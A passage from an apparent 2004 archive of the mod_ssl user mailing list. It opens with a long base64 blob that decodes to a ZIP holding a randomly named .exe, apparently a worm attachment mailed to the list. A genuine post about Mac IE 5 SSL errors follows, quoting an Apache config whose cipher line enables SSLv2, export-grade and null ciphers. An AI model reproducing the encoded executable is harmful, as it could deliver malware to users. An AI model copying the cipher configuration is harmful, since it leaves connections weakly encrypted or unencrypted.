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
ZXhlUEsFBgAAAAABAAEAOwAAAGxVAAAAAA==

----------fmyfnkfsnkvdxrccgsxa--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 26 18:15:07 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id F0CA9A897C; Fri, 26 Mar 2004 18:15:06 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from rwcrmhc13.comcast.net (rwcrmhc13.comcast.net [204.127.198.39])
	by master.modssl.org (Postfix) with ESMTP id 310A0A893A
	for ; Fri, 26 Mar 2004 18:14:50 +0100 (CET)
Received: from [192.168.1.10] (c-65-34-209-141.se.client2.attbi.com[65.34.209.141])
          by comcast.net (rwcrmhc13) with SMTP
          id <20040326171444015007t014e>; Fri, 26 Mar 2004 17:14:45 +0000
User-Agent: Microsoft-Entourage/10.1.4.030702.0
Date: Fri, 26 Mar 2004 12:14:43 -0500
Subject: Mac IE 5 ssl errors
From: Randall Perry 
To: 
Message-ID: 
Mime-version: 1.0
Content-type: text/plain; charset="US-ASCII"
Content-transfer-encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Randall Perry 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Just noticed that Mac IE 5 is having problems with ssl connections to my
apache 1.3.29 server. I either get the 'Security failure. Data decryption
error,' or it'll connect but graphics won't load on https pages, and I get
this error in httpd error.log:

[Fri Mar 26 12:05:06 2004] [error] mod_ssl: SSL handshake interrupted by
system [Hint: Stop button pressed in browser?!] (System error follows)
[Fri Mar 26 12:05:06 2004] [error] System: Connection reset by peer (errno:
54)

Found these changes to httpd.conf on searching the list, and implemented
them, but to no avail. Anyone got a solution?

> 
> I just solved it. Do not use an SSLProtocol line. Comment out the
> SetEnvIf line that does nokeepalive for MSIE. Use the following
> instead.
> 
> BrowserMatch "MSIE [1-4]" nokeepalive ssl-unclean-shutdown \
>        downgrade-1.0 force-response-1.0
> BrowserMatch "MSIE [5-9]" ssl-unclean-shutdown
> 
> I'm also using this cipher suite line, but the default might work, too:
> 
> SSLCipherSuite 
> !EXP1024-RC4-SHA:!EXP1024-DES-CBC-SHA:ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MEDIUM:
> +LOW:+SSLv2:+EXP:+eNULL

-- 
Randall Perry
sysTame

Xserve Web Hosting/Co-location
Website Development/Promotion
Mac Consulting/Sales

http://www.systame.com/


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 26 18:24:30 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 36650A897C; Fri, 26 Mar 2004 18:24:30 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from dpc.ucar.edu (flood.dpc.ucar.edu [128.117.126.208])
	by master.modssl.org (Postfix) with ESMTP id 6C030A8958
	for ; Fri, 26 Mar 2004 18:24:11 +0100 (CET)
Received: from milquetoast.dpc.ucar.edu (milquetoast.dpc.ucar.edu [128.117.126.106])
	by dpc.ucar.edu (8.11.6/8.11.6) with ESMTP id i2QHNsr28056
	for ; Fri, 26 Mar 2004 10:23:54 -0700
Received: from milquetoast.dpc.ucar.edu (localhost.localdomain [127.0.0.1])
	by milquetoast.dpc.ucar.edu (8.12.8/8.12.8) with ESMTP id i2QHNsTu031776
	for ; Fri, 26 Mar 2004 10:23:54 -0700
Received: (from peterb@localhost)
	by milquetoast.dpc.ucar.edu (8.12.8/8.12.8/Submit) id i2QHNsfd031774
	for modssl-users@modssl.org; Fri, 26 Mar 2004 10:23:54 -0700
Date: Fri, 26 Mar 2004 10:23:54 -0700
From: Peter Burkholder 
To: modssl-users@modssl.org
